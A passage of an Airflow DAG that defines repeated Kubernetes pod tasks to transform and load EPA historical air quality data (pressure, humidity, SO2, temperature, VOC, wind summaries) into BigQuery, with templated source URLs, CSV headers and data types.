"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pressure_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pressure_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pressure_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
rh_and_dp_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="rh_and_dp_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - rh_and_dp_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
rh_and_dp_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="rh_and_dp_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - rh_and_dp_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
so2_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="so2_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.so2_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.so2_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.so2_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.so2_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.so2_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - so2_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
so2_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="so2_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - so2_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
temperature_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="temperature_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - temperature_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
temperature_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="temperature_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - temperature_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
voc_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="voc_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.voc_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.voc_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.voc_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.voc_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.voc_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - voc_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
voc_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="voc_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - voc_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
wind_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="wind_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.wind_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.wind_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.wind_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.wind_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.wind_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - wind_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
wind_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="wind_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - wind_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
